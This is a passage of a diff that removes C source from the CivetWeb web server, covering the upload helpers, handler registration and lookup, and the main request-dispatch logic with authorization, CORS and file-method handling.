-	            filename);
-	if (!truncated) {
-		mg_cry(fud->conn, "%s: File path too long", __func__);
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-	return FORM_FIELD_STORAGE_STORE;
-}
-
-
-/* Helper function for deprecated mg_upload. */
-static int
-mg_upload_field_get(const char *key,
-                    const char *value,
-                    size_t value_size,
-                    void *user_data)
-{
-	/* Function should never be called */
-	(void)key;
-	(void)value;
-	(void)value_size;
-	(void)user_data;
-
-	return 0;
-}
-
-
-/* Helper function for deprecated mg_upload. */
-static int
-mg_upload_field_stored(const char *path, long long file_size, void *user_data)
-{
-	struct mg_upload_user_data *fud = (struct mg_upload_user_data *)user_data;
-	(void)file_size;
-
-	fud->num_uploaded_files++;
-	fud->conn->ctx->callbacks.upload(fud->conn, path);
-
-	return 0;
-}
-
-
-/* Deprecated function mg_upload - use mg_handle_form_request instead. */
-int
-mg_upload(struct mg_connection *conn, const char *destination_dir)
-{
-	struct mg_upload_user_data fud = {conn, destination_dir, 0};
-	struct mg_form_data_handler fdh = {mg_upload_field_found,
-	                                   mg_upload_field_get,
-	                                   mg_upload_field_stored,
-	                                   0};
-	int ret;
-
-	fdh.user_data = (void *)&fud;
-	ret = mg_handle_form_request(conn, &fdh);
-
-	if (ret < 0) {
-		mg_cry(conn, "%s: Error while parsing the request", __func__);
-	}
-
-	return fud.num_uploaded_files;
-}
-#endif
-
-
-static int
-get_first_ssl_listener_index(const struct mg_context *ctx)
-{
-	unsigned int i;
-	int idx = -1;
-	if (ctx) {
-		for (i = 0; ((idx == -1) && (i < ctx->num_listening_sockets)); i++) {
-			idx = ctx->listening_sockets[i].is_ssl ? ((int)(i)) : -1;
-		}
-	}
-	return idx;
-}
-
-
-static void
-redirect_to_https_port(struct mg_connection *conn, int ssl_index)
-{
-	char host[1025];
-	const char *host_header;
-	size_t hostlen;
-
-	host_header = mg_get_header(conn, "Host");
-	hostlen = sizeof(host);
-	if (host_header != NULL) {
-		char *pos;
-
-		mg_strlcpy(host, host_header, hostlen);
-		host[hostlen - 1] = '\0';
-		pos = strchr(host, ':');
-		if (pos != NULL) {
-			*pos = '\0';
-		}
-	} else {
-		/* Cannot get host from the Host: header.
-		 * Fallback to our IP address. */
-		if (conn) {
-			sockaddr_to_string(host, hostlen, &conn->client.lsa);
-		}
-	}
-
-	/* Send host, port, uri and (if it exists) ?query_string */
-	if (conn) {
-		mg_printf(conn,
-		          "HTTP/1.1 302 Found\r\nLocation: https://%s:%d%s%s%s\r\n\r\n",
-		          host,
-#if defined(USE_IPV6)
-		          (conn->ctx->listening_sockets[ssl_index].lsa.sa.sa_family
-		           == AF_INET6)
-		              ? (int)ntohs(conn->ctx->listening_sockets[ssl_index]
-		                               .lsa.sin6.sin6_port)
-		              :
-#endif
-		              (int)ntohs(conn->ctx->listening_sockets[ssl_index]
-		                             .lsa.sin.sin_port),
-		          conn->request_info.local_uri,
-		          (conn->request_info.query_string == NULL) ? "" : "?",
-		          (conn->request_info.query_string == NULL)
-		              ? ""
-		              : conn->request_info.query_string);
-	}
-}
-
-
-static void
-mg_set_handler_type(struct mg_context *ctx,
-                    const char *uri,
-                    int handler_type,
-                    int is_delete_request,
-                    mg_request_handler handler,
-                    struct mg_websocket_subprotocols *subprotocols,
-                    mg_websocket_connect_handler connect_handler,
-                    mg_websocket_ready_handler ready_handler,
-                    mg_websocket_data_handler data_handler,
-                    mg_websocket_close_handler close_handler,
-                    mg_authorization_handler auth_handler,
-                    void *cbdata)
-{
-	struct mg_handler_info *tmp_rh, **lastref;
-	size_t urilen = strlen(uri);
-
-	if (handler_type == WEBSOCKET_HANDLER) {
-		/* assert(handler == NULL); */
-		/* assert(is_delete_request || connect_handler!=NULL ||
-		 *        ready_handler!=NULL || data_handler!=NULL ||
-		 *        close_handler!=NULL);
-		 */
-		/* assert(auth_handler == NULL); */
-		if (handler != NULL) {
-			return;
-		}
-		if (!is_delete_request && (connect_handler == NULL)
-		    && (ready_handler == NULL) && (data_handler == NULL)
-		    && (close_handler == NULL)) {
-			return;
-		}
-		if (auth_handler != NULL) {
-			return;
-		}
-	} else if (handler_type == REQUEST_HANDLER) {
-		/* assert(connect_handler==NULL && ready_handler==NULL &&
-		 *        data_handler==NULL && close_handler==NULL); */
-		/* assert(is_delete_request || (handler!=NULL));
-		 */
-		/* assert(auth_handler == NULL); */
-		if ((connect_handler != NULL) || (ready_handler != NULL)
-		    || (data_handler != NULL) || (close_handler != NULL)) {
-			return;
-		}
-		if (!is_delete_request && (handler == NULL)) {
-			return;
-		}
-		if (auth_handler != NULL) {
-			return;
-		}
-	} else { /* AUTH_HANDLER */
-		     /* assert(handler == NULL); */
-		     /* assert(connect_handler==NULL && ready_handler==NULL &&
-		      *        data_handler==NULL && close_handler==NULL); */
-		/* assert(auth_handler != NULL); */
-		if (handler != NULL) {
-			return;
-		}
-		if ((connect_handler != NULL) || (ready_handler != NULL)
-		    || (data_handler != NULL) || (close_handler != NULL)) {
-			return;
-		}
-		if (!is_delete_request && (auth_handler == NULL)) {
-			return;
-		}
-	}
-
-	if (!ctx) {
-		return;
-	}
-
-	mg_lock_context(ctx);
-
-	/* first try to find an existing handler */
-	lastref = &(ctx->handlers);
-	for (tmp_rh = ctx->handlers; tmp_rh != NULL; tmp_rh = tmp_rh->next) {
-		if (tmp_rh->handler_type == handler_type) {
-			if ((urilen == tmp_rh->uri_len) && !strcmp(tmp_rh->uri, uri)) {
-				if (!is_delete_request) {
-					/* update existing handler */
-					if (handler_type == REQUEST_HANDLER) {
-						tmp_rh->handler = handler;
-					} else if (handler_type == WEBSOCKET_HANDLER) {
-						tmp_rh->subprotocols = subprotocols;
-						tmp_rh->connect_handler = connect_handler;
-						tmp_rh->ready_handler = ready_handler;
-						tmp_rh->data_handler = data_handler;
-						tmp_rh->close_handler = close_handler;
-					} else { /* AUTH_HANDLER */
-						tmp_rh->auth_handler = auth_handler;
-					}
-					tmp_rh->cbdata = cbdata;
-				} else {
-					/* remove existing handler */
-					*lastref = tmp_rh->next;
-					mg_free(tmp_rh->uri);
-					mg_free(tmp_rh);
-				}
-				mg_unlock_context(ctx);
-				return;
-			}
-		}
-		lastref = &(tmp_rh->next);
-	}
-
-	if (is_delete_request) {
-		/* no handler to set, this was a remove request to a non-existing
-		 * handler */
-		mg_unlock_context(ctx);
-		return;
-	}
-
-	tmp_rh =
-	    (struct mg_handler_info *)mg_calloc_ctx(sizeof(struct mg_handler_info),
-	                                            1,
-	                                            ctx);
-	if (tmp_rh == NULL) {
-		mg_unlock_context(ctx);
-		mg_cry(fc(ctx), "%s", "Cannot create new request handler struct, OOM");
-		return;
-	}
-	tmp_rh->uri = mg_strdup(uri);
-	if (!tmp_rh->uri) {
-		mg_unlock_context(ctx);
-		mg_free(tmp_rh);
-		mg_cry(fc(ctx), "%s", "Cannot create new request handler struct, OOM");
-		return;
-	}
-	tmp_rh->uri_len = urilen;
-	if (handler_type == REQUEST_HANDLER) {
-		tmp_rh->handler = handler;
-	} else if (handler_type == WEBSOCKET_HANDLER) {
-		tmp_rh->subprotocols = subprotocols;
-		tmp_rh->connect_handler = connect_handler;
-		tmp_rh->ready_handler = ready_handler;
-		tmp_rh->data_handler = data_handler;
-		tmp_rh->close_handler = close_handler;
-	} else { /* AUTH_HANDLER */
-		tmp_rh->auth_handler = auth_handler;
-	}
-	tmp_rh->cbdata = cbdata;
-	tmp_rh->handler_type = handler_type;
-	tmp_rh->next = NULL;
-
-	*lastref = tmp_rh;
-	mg_unlock_context(ctx);
-}
-
-
-void
-mg_set_request_handler(struct mg_context *ctx,
-                       const char *uri,
-                       mg_request_handler handler,
-                       void *cbdata)
-{
-	mg_set_handler_type(ctx,
-	                    uri,
-	                    REQUEST_HANDLER,
-	                    handler == NULL,
-	                    handler,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    cbdata);
-}
-
-
-void
-mg_set_websocket_handler(struct mg_context *ctx,
-                         const char *uri,
-                         mg_websocket_connect_handler connect_handler,
-                         mg_websocket_ready_handler ready_handler,
-                         mg_websocket_data_handler data_handler,
-                         mg_websocket_close_handler close_handler,
-                         void *cbdata)
-{
-	mg_set_websocket_handler_with_subprotocols(ctx,
-	                                           uri,
-	                                           NULL,
-	                                           connect_handler,
-	                                           ready_handler,
-	                                           data_handler,
-	                                           close_handler,
-	                                           cbdata);
-}
-
-
-void
-mg_set_websocket_handler_with_subprotocols(
-    struct mg_context *ctx,
-    const char *uri,
-    struct mg_websocket_subprotocols *subprotocols,
-    mg_websocket_connect_handler connect_handler,
-    mg_websocket_ready_handler ready_handler,
-    mg_websocket_data_handler data_handler,
-    mg_websocket_close_handler close_handler,
-    void *cbdata)
-{
-	int is_delete_request = (connect_handler == NULL) && (ready_handler == NULL)
-	                        && (data_handler == NULL)
-	                        && (close_handler == NULL);
-	mg_set_handler_type(ctx,
-	                    uri,
-	                    WEBSOCKET_HANDLER,
-	                    is_delete_request,
-	                    NULL,
-	                    subprotocols,
-	                    connect_handler,
-	                    ready_handler,
-	                    data_handler,
-	                    close_handler,
-	                    NULL,
-	                    cbdata);
-}
-
-
-void
-mg_set_auth_handler(struct mg_context *ctx,
-                    const char *uri,
-                    mg_request_handler handler,
-                    void *cbdata)
-{
-	mg_set_handler_type(ctx,
-	                    uri,
-	                    AUTH_HANDLER,
-	                    handler == NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    handler,
-	                    cbdata);
-}
-
-
-static int
-get_request_handler(struct mg_connection *conn,
-                    int handler_type,
-                    mg_request_handler *handler,
-                    struct mg_websocket_subprotocols **subprotocols,
-                    mg_websocket_connect_handler *connect_handler,
-                    mg_websocket_ready_handler *ready_handler,
-                    mg_websocket_data_handler *data_handler,
-                    mg_websocket_close_handler *close_handler,
-                    mg_authorization_handler *auth_handler,
-                    void **cbdata)
-{
-	const struct mg_request_info *request_info = mg_get_request_info(conn);
-	if (request_info) {
-		const char *uri = request_info->local_uri;
-		size_t urilen = strlen(uri);
-		struct mg_handler_info *tmp_rh;
-
-		if (!conn || !conn->ctx) {
-			return 0;
-		}
-
-		mg_lock_context(conn->ctx);
-
-		/* first try for an exact match */
-		for (tmp_rh = conn->ctx->handlers; tmp_rh != NULL;
-		     tmp_rh = tmp_rh->next) {
-			if (tmp_rh->handler_type == handler_type) {
-				if ((urilen == tmp_rh->uri_len) && !strcmp(tmp_rh->uri, uri)) {
-					if (handler_type == WEBSOCKET_HANDLER) {
-						*subprotocols = tmp_rh->subprotocols;
-						*connect_handler = tmp_rh->connect_handler;
-						*ready_handler = tmp_rh->ready_handler;
-						*data_handler = tmp_rh->data_handler;
-						*close_handler = tmp_rh->close_handler;
-					} else if (handler_type == REQUEST_HANDLER) {
-						*handler = tmp_rh->handler;
-					} else { /* AUTH_HANDLER */
-						*auth_handler = tmp_rh->auth_handler;
-					}
-					*cbdata = tmp_rh->cbdata;
-					mg_unlock_context(conn->ctx);
-					return 1;
-				}
-			}
-		}
-
-		/* next try for a partial match, we will accept uri/something */
-		for (tmp_rh = conn->ctx->handlers; tmp_rh != NULL;
-		     tmp_rh = tmp_rh->next) {
-			if (tmp_rh->handler_type == handler_type) {
-				if ((tmp_rh->uri_len < urilen) && (uri[tmp_rh->uri_len] == '/')
-				    && (memcmp(tmp_rh->uri, uri, tmp_rh->uri_len) == 0)) {
-					if (handler_type == WEBSOCKET_HANDLER) {
-						*subprotocols = tmp_rh->subprotocols;
-						*connect_handler = tmp_rh->connect_handler;
-						*ready_handler = tmp_rh->ready_handler;
-						*data_handler = tmp_rh->data_handler;
-						*close_handler = tmp_rh->close_handler;
-					} else if (handler_type == REQUEST_HANDLER) {
-						*handler = tmp_rh->handler;
-					} else { /* AUTH_HANDLER */
-						*auth_handler = tmp_rh->auth_handler;
-					}
-					*cbdata = tmp_rh->cbdata;
-					mg_unlock_context(conn->ctx);
-					return 1;
-				}
-			}
-		}
-
-		/* finally try for pattern match */
-		for (tmp_rh = conn->ctx->handlers; tmp_rh != NULL;
-		     tmp_rh = tmp_rh->next) {
-			if (tmp_rh->handler_type == handler_type) {
-				if (match_prefix(tmp_rh->uri, tmp_rh->uri_len, uri) > 0) {
-					if (handler_type == WEBSOCKET_HANDLER) {
-						*subprotocols = tmp_rh->subprotocols;
-						*connect_handler = tmp_rh->connect_handler;
-						*ready_handler = tmp_rh->ready_handler;
-						*data_handler = tmp_rh->data_handler;
-						*close_handler = tmp_rh->close_handler;
-					} else if (handler_type == REQUEST_HANDLER) {
-						*handler = tmp_rh->handler;
-					} else { /* AUTH_HANDLER */
-						*auth_handler = tmp_rh->auth_handler;
-					}
-					*cbdata = tmp_rh->cbdata;
-					mg_unlock_context(conn->ctx);
-					return 1;
-				}
-			}
-		}
-
-		mg_unlock_context(conn->ctx);
-	}
-	return 0; /* none found */
-}
-
-
-/* Check if the script file is in a path, allowed for script files.
- * This can be used if uploading files is possible not only for the server
- * admin, and the upload mechanism does not check the file extension.
- */
-static int
-is_in_script_path(const struct mg_connection *conn, const char *path)
-{
-	/* TODO (Feature): Add config value for allowed script path.
-	 * Default: All allowed. */
-	(void)conn;
-	(void)path;
-	return 1;
-}
-
-
-#if defined(USE_WEBSOCKET) && defined(MG_LEGACY_INTERFACE)
-static int
-deprecated_websocket_connect_wrapper(const struct mg_connection *conn,
-                                     void *cbdata)
-{
-	struct mg_callbacks *pcallbacks = (struct mg_callbacks *)cbdata;
-	if (pcallbacks->websocket_connect) {
-		return pcallbacks->websocket_connect(conn);
-	}
-	/* No handler set - assume "OK" */
-	return 0;
-}
-
-
-static void
-deprecated_websocket_ready_wrapper(struct mg_connection *conn, void *cbdata)
-{
-	struct mg_callbacks *pcallbacks = (struct mg_callbacks *)cbdata;
-	if (pcallbacks->websocket_ready) {
-		pcallbacks->websocket_ready(conn);
-	}
-}
-
-
-static int
-deprecated_websocket_data_wrapper(struct mg_connection *conn,
-                                  int bits,
-                                  char *data,
-                                  size_t len,
-                                  void *cbdata)
-{
-	struct mg_callbacks *pcallbacks = (struct mg_callbacks *)cbdata;
-	if (pcallbacks->websocket_data) {
-		return pcallbacks->websocket_data(conn, bits, data, len);
-	}
-	/* No handler set - assume "OK" */
-	return 1;
-}
-#endif
-
-
-/* This is the heart of the Civetweb's logic.
- * This function is called when the request is read, parsed and validated,
- * and Civetweb must decide what action to take: serve a file, or
- * a directory, or call embedded function, etcetera. */
-static void
-handle_request(struct mg_connection *conn)
-{
-	struct mg_request_info *ri = &conn->request_info;
-	char path[PATH_MAX];
-	int uri_len, ssl_index;
-	int is_found = 0, is_script_resource = 0, is_websocket_request = 0,
-	    is_put_or_delete_request = 0, is_callback_resource = 0;
-	int i;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	mg_request_handler callback_handler = NULL;
-	struct mg_websocket_subprotocols *subprotocols;
-	mg_websocket_connect_handler ws_connect_handler = NULL;
-	mg_websocket_ready_handler ws_ready_handler = NULL;
-	mg_websocket_data_handler ws_data_handler = NULL;
-	mg_websocket_close_handler ws_close_handler = NULL;
-	void *callback_data = NULL;
-	mg_authorization_handler auth_handler = NULL;
-	void *auth_callback_data = NULL;
-	int handler_type;
-	time_t curtime = time(NULL);
-	char date[64];
-
-	path[0] = 0;
-
-	/* 1. get the request url */
-	/* 1.1. split into url and query string */
-	if ((conn->request_info.query_string = strchr(ri->request_uri, '?'))
-	    != NULL) {
-		*((char *)conn->request_info.query_string++) = '\0';
-	}
-
-	/* 1.2. do a https redirect, if required. Do not decode URIs yet. */
-	if (!conn->client.is_ssl && conn->client.ssl_redir) {
-		ssl_index = get_first_ssl_listener_index(conn->ctx);
-		if (ssl_index >= 0) {
-			redirect_to_https_port(conn, ssl_index);
-		} else {
-			/* A http to https forward port has been specified,
-			 * but no https port to forward to. */
-			mg_send_http_error(conn,
-			                   503,
-			                   "%s",
-			                   "Error: SSL forward not configured properly");
-			mg_cry(conn, "Can not redirect to SSL, no SSL port available");
-		}
-		return;
-	}
-	uri_len = (int)strlen(ri->local_uri);
-
-	/* 1.3. decode url (if config says so) */
-	if (should_decode_url(conn)) {
-		mg_url_decode(
-		    ri->local_uri, uri_len, (char *)ri->local_uri, uri_len + 1, 0);
-	}
-
-	/* 1.4. clean URIs, so a path like allowed_dir/../forbidden_file is
-	 * not possible */
-	remove_double_dots_and_double_slashes((char *)ri->local_uri);
-
-	/* step 1. completed, the url is known now */
-	uri_len = (int)strlen(ri->local_uri);
-	DEBUG_TRACE("URL: %s", ri->local_uri);
-
-	/* 2. if this ip has limited speed, set it for this connection */
-	conn->throttle = set_throttle(conn->ctx->config[THROTTLE],
-	                              get_remote_ip(conn),
-	                              ri->local_uri);
-
-	/* 3. call a "handle everything" callback, if registered */
-	if (conn->ctx->callbacks.begin_request != NULL) {
-		/* Note that since V1.7 the "begin_request" function is called
-		 * before an authorization check. If an authorization check is
-		 * required, use a request_handler instead. */
-		i = conn->ctx->callbacks.begin_request(conn);
-		if (i > 0) {
-			/* callback already processed the request. Store the
-			   return value as a status code for the access log. */
-			conn->status_code = i;
-			discard_unread_request_data(conn);
-			return;
-		} else if (i == 0) {
-			/* civetweb should process the request */
-		} else {
-			/* unspecified - may change with the next version */
-			return;
-		}
-	}
-
-	/* request not yet handled by a handler or redirect, so the request
-	 * is processed here */
-
-	/* 4. Check for CORS preflight requests and handle them (if configured).
-	 * https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
-	 */
-	if (!strcmp(ri->request_method, "OPTIONS")) {
-		/* Send a response to CORS preflights only if
-		 * access_control_allow_methods is not NULL and not an empty string.
-		 * In this case, scripts can still handle CORS. */
-		const char *cors_meth_cfg =
-		    conn->ctx->config[ACCESS_CONTROL_ALLOW_METHODS];
-		const char *cors_orig_cfg =
-		    conn->ctx->config[ACCESS_CONTROL_ALLOW_ORIGIN];
-		const char *cors_origin =
-		    get_header(ri->http_headers, ri->num_headers, "Origin");
-		const char *cors_acrm = get_header(ri->http_headers,
-		                                   ri->num_headers,
-		                                   "Access-Control-Request-Method");
-
-		/* Todo: check if cors_origin is in cors_orig_cfg.
-		 * Or, let the client check this. */
-
-		if ((cors_meth_cfg != NULL) && (*cors_meth_cfg != 0)
-		    && (cors_orig_cfg != NULL) && (*cors_orig_cfg != 0)
-		    && (cors_origin != NULL) && (cors_acrm != NULL)) {
-			/* This is a valid CORS preflight, and the server is configured
-			 * to
-			 * handle it automatically. */
-			const char *cors_acrh =
-			    get_header(ri->http_headers,
-			               ri->num_headers,
-			               "Access-Control-Request-Headers");
-
-			gmt_time_string(date, sizeof(date), &curtime);
-			mg_printf(conn,
-			          "HTTP/1.1 200 OK\r\n"
-			          "Date: %s\r\n"
-			          "Access-Control-Allow-Origin: %s\r\n"
-			          "Access-Control-Allow-Methods: %s\r\n"
-			          "Content-Length: 0\r\n"
-			          "Connection: %s\r\n",
-			          date,
-			          cors_orig_cfg,
-			          ((cors_meth_cfg[0] == '*') ? cors_acrm : cors_meth_cfg),
-			          suggest_connection_header(conn));
-
-			if (cors_acrh != NULL) {
-				/* CORS request is asking for additional headers */
-				const char *cors_hdr_cfg =
-				    conn->ctx->config[ACCESS_CONTROL_ALLOW_HEADERS];
-
-				if ((cors_hdr_cfg != NULL) && (*cors_hdr_cfg != 0)) {
-					/* Allow only if access_control_allow_headers is
-					 * not NULL and not an empty string. If this
-					 * configuration is set to *, allow everything.
-					 * Otherwise this configuration must be a list
-					 * of allowed HTTP header names. */
-					mg_printf(conn,
-					          "Access-Control-Allow-Headers: %s\r\n",
-					          ((cors_hdr_cfg[0] == '*') ? cors_acrh
-					                                    : cors_hdr_cfg));
-				}
-			}
-			mg_printf(conn, "Access-Control-Max-Age: 60\r\n");
-
-			mg_printf(conn, "\r\n");
-			return;
-		}
-	}
-
-	/* 5. interpret the url to find out how the request must be handled
-	 */
-	/* 5.1. first test, if the request targets the regular http(s)://
-	 * protocol namespace or the websocket ws(s):// protocol namespace.
-	 */
-	is_websocket_request = is_websocket_protocol(conn);
-#if defined(USE_WEBSOCKET)
-	handler_type = is_websocket_request ? WEBSOCKET_HANDLER : REQUEST_HANDLER;
-#else
-	handler_type = REQUEST_HANDLER;
-#endif /* defined(USE_WEBSOCKET) */
-	/* 5.2. check if the request will be handled by a callback */
-	if (get_request_handler(conn,
-	                        handler_type,
-	                        &callback_handler,
-	                        &subprotocols,
-	                        &ws_connect_handler,
-	                        &ws_ready_handler,
-	                        &ws_data_handler,
-	                        &ws_close_handler,
-	                        NULL,
-	                        &callback_data)) {
-		/* 5.2.1. A callback will handle this request. All requests
-		 * handled
-		 * by a callback have to be considered as requests to a script
-		 * resource. */
-		is_callback_resource = 1;
-		is_script_resource = 1;
-		is_put_or_delete_request = is_put_or_delete_method(conn);
-	} else {
-	no_callback_resource:
-		/* 5.2.2. No callback is responsible for this request. The URI
-		 * addresses a file based resource (static content or Lua/cgi
-		 * scripts in the file system). */
-		is_callback_resource = 0;
-		interpret_uri(conn,
-		              path,
-		              sizeof(path),
-		              &file.stat,
-		              &is_found,
-		              &is_script_resource,
-		              &is_websocket_request,
-		              &is_put_or_delete_request);
-	}
-
-	/* 6. authorization check */
-	/* 6.1. a custom authorization handler is installed */
-	if (get_request_handler(conn,
-	                        AUTH_HANDLER,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        NULL,
-	                        &auth_handler,
-	                        &auth_callback_data)) {
-		if (!auth_handler(conn, auth_callback_data)) {
-			return;
-		}
-	} else if (is_put_or_delete_request && !is_script_resource
-	           && !is_callback_resource) {
-/* 6.2. this request is a PUT/DELETE to a real file */
-/* 6.2.1. thus, the server must have real files */
-#if defined(NO_FILES)
-		if (1) {
-#else
-		if (conn->ctx->config[DOCUMENT_ROOT] == NULL) {
-#endif
-			/* This server does not have any real files, thus the
-			 * PUT/DELETE methods are not valid. */
-			mg_send_http_error(conn,
-			                   405,
-			                   "%s method not allowed",
-			                   conn->request_info.request_method);
-			return;
-		}
-
-#if !defined(NO_FILES)
-		/* 6.2.2. Check if put authorization for static files is
-		 * available.
-		 */
-		if (!is_authorized_for_put(conn)) {
-			send_authorization_request(conn, NULL);
-			return;
-		}
-#endif
-
-	} else {
-		/* 6.3. This is either a OPTIONS, GET, HEAD or POST request,
-		 * or it is a PUT or DELETE request to a resource that does not
-		 * correspond to a file. Check authorization. */
-		if (!check_authorization(conn, path)) {
-			send_authorization_request(conn, NULL);
-			return;
-		}
-	}
-
-	/* request is authorized or does not need authorization */
-
-	/* 7. check if there are request handlers for this uri */
-	if (is_callback_resource) {
-		if (!is_websocket_request) {
-			i = callback_handler(conn, callback_data);
-			if (i > 0) {
-				/* Do nothing, callback has served the request. Store
-				 * then return value as status code for the log and discard
-				 * all data from the client not used by the callback. */
-				conn->status_code = i;
-				discard_unread_request_data(conn);
-			} else {
-				/* The handler did NOT handle the request. */
-				/* Some proper reactions would be:
-				 * a) close the connections without sending anything
-				 * b) send a 404 not found
-				 * c) try if there is a file matching the URI
-				 * It would be possible to do a, b or c in the callback
-				 * implementation, and return 1 - we cannot do anything
-				 * here, that is not possible in the callback.
-				 *
-				 * TODO: What would be the best reaction here?
-				 * (Note: The reaction may change, if there is a better
-				 *idea.)
-				 */
-
-				/* For the moment, use option c: We look for a proper file,
-				 * but since a file request is not always a script resource,
-				 * the authorization check might be different. */
-				interpret_uri(conn,
-				              path,
-				              sizeof(path),
-				              &file.stat,
-				              &is_found,
-				              &is_script_resource,
-				              &is_websocket_request,
-				              &is_put_or_delete_request);
-				callback_handler = NULL;
-
-				/* Here we are at a dead end:
-				 * According to URI matching, a callback should be
-				 * responsible for handling the request,
-				 * we called it, but the callback declared itself
-				 * not responsible.
-				 * We use a goto here, to get out of this dead end,
-				 * and continue with the default handling.
-				 * A goto here is simpler and better to understand
-				 * than some curious loop. */
-				goto no_callback_resource;
-			}
-		} else {
-#if defined(USE_WEBSOCKET)
-			handle_websocket_request(conn,
-			                         path,
-			                         is_callback_resource,
-			                         subprotocols,
-			                         ws_connect_handler,
-			                         ws_ready_handler,
-			                         ws_data_handler,
-			                         ws_close_handler,
-			                         callback_data);
-#endif
-		}
-		return;
-	}
-
-/* 8. handle websocket requests */
-#if defined(USE_WEBSOCKET)
-	if (is_websocket_request) {
-		if (is_script_resource) {
-
-			if (is_in_script_path(conn, path)) {
-				/* Websocket Lua script */
-				handle_websocket_request(conn,
-				                         path,
-				                         0 /* Lua Script */,
-				                         NULL,
-				                         NULL,
-				                         NULL,
-				                         NULL,
-				                         NULL,
-				                         &conn->ctx->callbacks);
-			} else {
-				/* Script was in an illegal path */
-				mg_send_http_error(conn, 403, "%s", "Forbidden");
-			}
-		} else {
-#if defined(MG_LEGACY_INTERFACE)
-			handle_websocket_request(
-			    conn,
-			    path,
-			    !is_script_resource /* could be deprecated global callback */,
-			    NULL,
-			    deprecated_websocket_connect_wrapper,
-			    deprecated_websocket_ready_wrapper,
-			    deprecated_websocket_data_wrapper,
-			    NULL,
-			    &conn->ctx->callbacks);
-#else
-			mg_send_http_error(conn, 404, "%s", "Not found");
-#endif
-		}
-		return;
-	} else
-#endif
-
-#if defined(NO_FILES)
-		/* 9a. In case the server uses only callbacks, this uri is
-		 * unknown.
-		 * Then, all request handling ends here. */
-		mg_send_http_error(conn, 404, "%s", "Not Found");
-
-#else
-	/* 9b. This request is either for a static file or resource handled
-	 * by a script file. Thus, a DOCUMENT_ROOT must exist. */
-	if (conn->ctx->config[DOCUMENT_ROOT] == NULL) {
-		mg_send_http_error(conn, 404, "%s", "Not Found");
-		return;
-	}
-
-	/* 10. Request is handled by a script */
-	if (is_script_resource) {
-		handle_file_based_request(conn, path, &file);
-		return;
-	}
-
-	/* 11. Handle put/delete/mkcol requests */
-	if (is_put_or_delete_request) {
-		/* 11.1. PUT method */
-		if (!strcmp(ri->request_method, "PUT")) {
-			put_file(conn, path);
-			return;
-		}
-		/* 11.2. DELETE method */
-		if (!strcmp(ri->request_method, "DELETE")) {
-			delete_file(conn, path);
-			return;
-		}
-		/* 11.3. MKCOL method */
-		if (!strcmp(ri->request_method, "MKCOL")) {
-			mkcol(conn, path);
-			return;
-		}
-		/* 11.4. PATCH method
-		 * This method is not supported for static resources,
-		 * only for scripts (Lua, CGI) and callbacks. */
-		mg_send_http_error(conn,
-		                   405,
-		                   "%s method not allowed",
-		                   conn->request_info.request_method);
-		return;
-	}
-
-	/* 11. File does not exist, or it was configured that it should be
-	 * hidden */
-	if (!is_found || (must_hide_file(conn, path))) {
-		mg_send_http_error(conn, 404, "%s", "Not found");
-		return;
-	}
-
-	/* 12. Directory uris should end with a slash */
-	if (file.stat.is_directory && (uri_len > 0)
-	    && (ri->local_uri[uri_len - 1] != '/')) {
-		gmt_time_string(date, sizeof(date), &curtime);
-		mg_printf(conn,
-		          "HTTP/1.1 301 Moved Permanently\r\n"
-		          "Location: %s/\r\n"
-		          "Date: %s\r\n"
-		          /* "Cache-Control: private\r\n" (= default) */
-		          "Content-Length: 0\r\n"
-		          "Connection: %s\r\n",
-		          ri->request_uri,
-		          date,
-		          suggest_connection_header(conn));
-		send_additional_header(conn);
-		mg_printf(conn, "\r\n");
-		return;
-	}
-
-	/* 13. Handle other methods than GET/HEAD */
-	/* 13.1. Handle PROPFIND */
-	if (!strcmp(ri->request_method, "PROPFIND")) {
-		handle_propfind(conn, path, &file.stat);
-		return;
-	}
-	/* 13.2. Handle OPTIONS for files */
-	if (!strcmp(ri->request_method, "OPTIONS")) {
-		/* This standard handler is only used for real files.
-		 * Scripts should support the OPTIONS method themselves, to allow a
-		 * maximum flexibility.
-		 * Lua and CGI scripts may fully support CORS this way (including
-		 * preflights). */
-		send_options(conn);
-		return;
-	}
-	/* 13.3. everything but GET and HEAD (e.g. POST) */
-	if ((0 != strcmp(ri->request_method, "GET"))
-	    && (0 != strcmp(ri->request_method, "HEAD"))) {
-		mg_send_http_error(conn,
-		                   405,
-		                   "%s method not allowed",
-		                   conn->request_info.request_method);
-		return;
-	}
-
-	/* 14. directories */
-	if (file.stat.is_directory) {
-		/* Substitute files have already been handled above. */
-		/* Here we can either generate and send a directory listing,
-		 * or send an "access denied" error. */
-		if (!mg_strcasecmp(conn->ctx->config[ENABLE_DIRECTORY_LISTING],
-		                   "yes")) {
-			handle_directory_request(conn, path);
-		} else {
-			mg_send_http_error(conn,
-			                   403,
-			                   "%s",
-			                   "Error: Directory listing denied");
-		}
-		return;
-	}
-
-	handle_file_based_request(conn, path, &file);
-#endif /* !defined(NO_FILES) */
-
-#if 0
-            /* Perform redirect and auth checks before calling begin_request()
-             * handler.
-             * Otherwise, begin_request() would need to perform auth checks and
-             * redirects. */
-#endif
-}
-
-
-static void
-handle_file_based_request(struct mg_connection *conn,
-                          const char *path,
-                          struct mg_file *file)
-{
-	if (!conn || !conn->ctx) {
-		return;
-	}
-
-	if (0) {
-#ifdef USE_LUA
-	} else if (match_prefix(conn->ctx->config[LUA_SERVER_PAGE_EXTENSIONS],
-	                        strlen(
-	                            conn->ctx->config[LUA_SERVER_PAGE_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* Lua server page: an SSI like page containing mostly plain
-			 * html
-			 * code
-			 * plus some tags with server generated contents. */
-			handle_lsp_request(conn, path, file, NULL);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-
-	} else if (match_prefix(conn->ctx->config[LUA_SCRIPT_EXTENSIONS],
-	                        strlen(conn->ctx->config[LUA_SCRIPT_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* Lua in-server module script: a CGI like script used to
-			 * generate
-			 * the
